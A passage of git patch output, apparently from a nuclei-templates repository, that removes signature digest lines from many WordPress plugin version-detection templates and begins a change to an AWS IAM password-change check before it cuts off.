4b0a00483046022100880b62a99ca878152f406c03a50a8bac06461d00eed67bdd028e10ed43565dad022100e2796f6eeb1e12167dc9bdd8c8b2a6f02c867b2d9755e0dfd5bc2e4179d2287c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 7ec570c01c..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae56425f54d3a8d92d482a29a4ba9d5aeaedcd837c63517513e136872144fe0702210094c0af8474205777dd198c647486576982fa177752cfa2deed4f71d48e406bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index ff156ff2dd..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004987928377424d2476676a648e3c71b52b00493e45c69c0be20984b1ef3115a02207b37d1d399445d51341d911a58b1fdf0f372a71967dda6a703098135961e6c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 5fed000667..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060b2159b4a5dc6d9805ac26bae31a8b529d91668aadbf020193ed0c94afaacf3022100887b939faaab4c4d2139a6f7295b5821693ef36889ead98c82cc07b42b5d3814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 3b0b34ee75..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea2ec10799438ac4d2d1097ba2c8e4aaf316d33a7934f6885431ad661c7382e1022100d0e420271ba6ccf2dbb238dd67004945a104814204e8e2ba2aafee787c0931e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8ca450bb37..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202626e1d61a0cf7717afb91b551e6c2aa7a4b02947df58bcde287759e45e6d24902205673d729d615fc8515e6191627b420eb59fe7e426e30e2095bb5dfd7ec3f39c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 7c2c668eff..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015f293a0a88f85ef2ff9097d3b7d5fb0ba2769039afe9961eaabc000dc6f9991022100a20d2498a861a3b91772e8b63785e9b353ffbdae5054fa919a6e80977922cfc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 14a8d44043..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ddc3d62f9124aa481be5618dda8d9f93fd1ff7ec1c4293459802eb269a98d1cc0221008cd662b5beb61ce9d958950e8e5d5aa9ffdf2f6bb9e185a68152ad400b21b377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 055e8aaa14..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203935b6bc98152a4c450369d31b2beb062fed61290ca232db6586579b26f7da3b022006ae05572edad24f75c584b5ee9ea75be02d194f11120f841619387d478e649b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index b8d36595de..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a84e93725f7afd6f011d94c0319e8b062302a2aaf9b0fcc1f9942b52286912b3022100fd0c5ab155e120b67f824df48c48234a6c1f77ca2ef90ab7968b0f488665c387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index ffa7ac5945..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d64f47714f9e9a4462d9467c7a93135c49c9fdf97f09cc68ca296ed31363e7c802201e942534252420a9f83236ece8b22ca2a61bb7cc50313741168174ecb3cc943d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 8484824dd1..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f717420a4f7d0616a572c13042f703d10c0c9d3d409dd6298a4e24ab0128d85022100cd64a3bea49227fccaa934fc1d638fd76fde90bf26ea849768f60a36f5647f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 7aa5730f6b..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220309c3b856f95bd2ab4cc543b7fbb22e26178ddc649de5a14eac88ea136227c42022100eb977179ab13d7be0e42fa33172a64f7e1876c1a309da6037da13ae542002d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 8e4f3f0966..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064653aae9a028d93f2cf158dfb5879eb714e3b5762f828496f6793f8d89355ed022009d70f7fcd904d34dfcf448a0d2b914b24a88656a9658508b74e1167d9de60df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 952d88d3ae..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e4a0b8b3e845461e1ff3852ad1df97c13537a46a6846418d35d23bc435570b50220420a1fa3650c6b2ceeababd11c42344788311e18675a9dd217798bd14c719f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index a93413f2b2..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0aabbbbd01d68085146f3bade399505ada159575f5b9456e7561372fec222240220526f5ad2c85f877dae08b85295b117fc3eeccc4a03c66103d3d34cb33385baf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 175574267f..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd6ae53da41150d02b558d8bca356d6c1aee9c788efec92cd8a26c0bb873866602207a23943168bd907957e69b8b3ef36a5e7b837940b36357ec776f890093257e12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index c0ae835880..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dccb50f99287e76497507e46121692b2b03c544097e3bcf9a65d5f7af7e883d022100f62f8def7d74c419d562a1c87df3b09f84ca547ab7502ceaa674fa8d8bb68892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c0b3fcd6ed..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220030329cbca4c263bd0cf912b369e26dc6e30fb56c9a01d94d1a5e5ccf554a90c0220661cb952aaa039902ab28c0337e49a2e0e806addc79d9fd021c05019d3762ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f618ce14b..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f192ccd6c08b0d3f569ed8940c2fcf3571620497a144cd6f70b1a4ef7d0e8ba302200f232df0ead9e8bd3440da7f36ced00f165933dc618f372174a21e5a9a232d6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 3640949dc1..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b2e34027d6121c6d47311823b9d7ba0006aa8d439e97fc7227c84903c75468602200d9048bb311e229f93e509b4e4180fea37b383a93f4e5c08f4c6e7b418c77d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b6452787b6..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c565ea11ef627c188f3052a23ad68b1eb7eb0b983e3da6aca552290f2ce9acf022035812919c518ee7ad0cb903b040a6a440713d2bbc6a4c3ae29b14ba5f775c978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 4c6f344e9c..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009fd51e196ef5b2a8854a5c7a0bf7a9f1407710e80ec149dae0e3c9f819537a4102207b42748f513457aa879ad4cb19db045790fe3552373202137e3970600ec8421b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index c210531685..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022044a4a32afe555db7ea9a2b5212b52c1f5f0db66060a404a53d4527a3cfa3eb52022100ba24e9da4eafd075a90a0cd7a92fc48885d9bf5d2f1e7132c21031913c5dc123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index d5de7a7110..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a68d22859fbbd928717d9fd3a619ccedfe2b7ac80ef0db240e80b851a4c84c402201cd6acee49f4b33409c9b2decc6a27774681c8ae3b84df3a51f2f19922ac492d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 6ef2d1b4c9..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042a7080cc64b9c9c5a305653baffedb29becb04e103d51ab53914c0a5efeef940221009e967fbde025bc896283ff10f472314ad73ed1531b019a36a84514fc78e0e013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 56dbe080e9..01a3669132 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2c5c52f56e8aa0f89525d9eeca6220db13c18d5d29045bad088d6f9fe367fc702203bfb530fdcc103128523b7f3c5fedeb011c10a5f8c4fc0d7a1b352a2f4038801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 675ae96da2..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038bfc2ca45605964959bbe6274e2cc2501a0472d098078b6703e8e17d8cdf96d022100ae008b2d5f66bda1640f25a4acf4c8943173afa532746609fa51248380d6007a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 66001b02bf..dc18db23b1 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad88e06500696f5510a3b196c22c146398171f82aaea88ae797b38fb682b3b4e022100ae5fa91d210543cd295bf3f1bcf2382b5f1e662113c4dc6d39e71155a4b6162f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index df33078ded..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055a33491ae23fbe4c11b752798b47ba1606172474f2cd70eb449e823ee911736022100e1688790a1280292ad5199874e27e094a23ede628e5615ba75beedef7a8c7748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index bde81574ad..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e97717655fba5ecdbd7505a56984dceeee6b9277831752826469c84df4a3bf3a022100b25cbbcb0f899497bab8f2c267927d9281f6f285dd1e79048ea0269b2d1aa1e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 19a9112d60..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5ddc1592d6ed1df8f8bc64825652cb77cb8d031c65d57d9aa1cd5427955a9e60221009cf7609c47e0e1058b6734000f54b1864eed497077fb4d24f841c63202e5e3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 8f1164508c..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d93fcbe16b066a840bf87cfb777dd8604e1d95ae103a6c63eec2fe955b8b0bc3022100e8b9b5edc236b2441f9d05ded03e575330c9e2fa474dc4500d70d5a330f5ec50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 35f7cbbaec..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207210d9e0393df70e4902ddf47f3e7773cef7577fe531f5b2271166c3a415549b0220255b418201eb0d10d20c09787c55ad36eb2ab42e6a41cdd17614bdacafff7073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index cd34bba66d..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220235034a8120d37fcd0bcaa1c221e2444ee5a9b771777accce134ba1a1a84f9a00220184fb7bff236a77c4de6c187a074819eae96a122114b6d930312e2e7bdd12a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 43e45e1b6e..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c4ab05836abd96e1163120c35621ad4ded63eb547b275275785b708656c33e9022100967c219a0a19da0491dea3dbf36be942c4719fe0a4c24dc9af9cf103c45d2809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 7e6edd2b9d..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e0267db91c896723ac4b449ee1203c65915acda40f06db4abb0588d0a1732ee022057047f5b332d912e4e0b482cf0a0e4aed14c87db94e78675ad4272e0e9e8b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 4eb61a88ec..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae152b49f89b8dfbab55a9310f449f96986c8504623fe2339b1e8a27318a5b01022100be3c57ae3aa0fc0e14d9a6a11b32970df8426009672be13477ee699dd9fb1b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 81c4eb649c..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206aeace6b1234e9e11a1bfd05ce7e785870e499a698792a324c77871ed0f041c5022100afa2272dcf3a05b0c17b18af76b68750548156c170a0217bba1c2d2fae2f305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 9be306d731..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac97001f3dabdabfaab45bba38f0f52d7ca1ab1b435b669b3e9684df057a8592022100f369936d8f1f7a50105dfecf858541a9ef423cb57a0d65f77400493881b5f1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 5e9fe7c431..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5735c96d91cf99808747a55e11dc4e1d5976e898bc526cff6f67843b6aaff92022100cf96a434322bf472c8b650d08ad3b1f3faa57a9e30b91c95d6b8898e01596e2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c99966ab40..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ecc66735715bc8bc00e80560cd4e171ed651822daeb41ef762c313fa5d6ccbf02210080d646cc8c140c4054003a6e571a03145fc4b1c327c5918e1cb093f632628605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 2e80a25489..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c67dd6e7b15bf295d315d9bcf51b3cd239c636143d9c2e8ff3c5869bd0ec5ca022100d772c6ec2bf7044e1fd3715596e127e1276b1865a833e11abf898b005232e3cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 7faccfdfb8..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0b75822136b2eff372528681158e7f1f80af9adb1bd4fc907c507f9ee4387cd022032cb0f49ebb1bca31af7ca910edc777e4f193d5ba42fb299d9469efa2433e8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 981002ee17..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203900d2922eff78ddb3d1ba776d2451f2280cab2ac4488b4442107c50b065df79022100917fd7371e65fc546ba58755c4c39cf297daaab5565fcfd556abf24b6e561b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 0e26f4b5e7..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a896044b723aedf8677c27488947ccf7cc4ff99d7780acea3cec70076e482eb022065c5b718a59a8b652e73005cd75f674e6ca06aa1ede5e280bbeb5077aa3479f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 58f33ef26ef9ff7619447231d9431465525d16d7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 17 Oct 2024 08:45:21 +0700 Subject: [PATCH 182/218] Update iam-user-password-change.yaml --- cloud/aws/iam/iam-user-password-change.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cloud/aws/iam/iam-user-password-change.yaml b/cloud/aws/iam/iam-user-password-change.yaml index 483c80c910..2ad736c260 100644 --- a/cloud/aws/iam/iam-user-password-change.yaml +++ b/cloud/aws/iam/iam-user-password-change.yaml @@ -20,10 +20,10 @@ code: matchers: - type: word words: - - "true" + - 